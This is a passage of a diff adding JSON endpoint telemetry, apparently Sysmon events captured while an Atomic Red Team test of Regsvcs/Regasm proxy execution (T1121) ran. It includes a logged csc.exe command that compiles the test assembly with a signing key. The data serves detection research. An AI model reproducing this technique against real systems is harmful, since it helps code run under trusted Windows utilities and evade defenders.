"registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "file", + "file_name": "key.snk", + "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\key.snk", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "command_line": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7696, + "ppid": 7036, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "subtype": "create", + "timestamp": 131883570869860000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "csc.exe", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "psapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\psapi.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\SysWOW64\\version.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mscorlib.ni.dll", + "image_path": "C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\6715dc4d04e35f16d482900c355325e9\\mscorlib.ni.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 